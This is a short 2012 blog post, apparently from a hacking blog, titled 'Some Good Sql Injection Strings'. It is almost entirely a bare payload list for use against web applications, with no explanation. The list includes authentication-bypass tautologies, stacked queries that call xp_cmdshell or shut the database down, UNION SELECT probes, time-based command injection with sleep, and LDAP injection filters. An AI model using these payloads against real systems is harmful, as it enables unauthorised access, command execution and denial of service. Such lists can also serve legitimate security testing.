' " # - -- ' -- --'; ' ; = ' = ; = -- \x23 \x27 \x3D \x3B' \x3D \x27 \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ';shutdown-- <>"'%;)(&+ ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT '%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */*
.NET SOFTWARES, SOURCE, PHP SCRIPTS, EXPLOITS, REVERSED SOFT, SQL INJECTION, ATTACKS AND DEFENCES, DEFACEMENT, NETWORK SECURITY, WEB SECURITY, SOFTWARE ENCRYPTION, SECURE CODE WRITTING, BUFFER OVERFLOW, PHP INJECTIONS, SQL INJECTIONS, HTTP INJECTIONS, AJAX INJECTION, JAVASCRIPT INJECTIONS, CROSS SITE SCRIPTING, METASPLOIT, BACKTRACK, VIRTUAL BOX, MYSQL, ORACLE, MSACCESS, VULNERABILITIES
Thursday, August 9, 2012
Some Good Sql Injection Strings
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment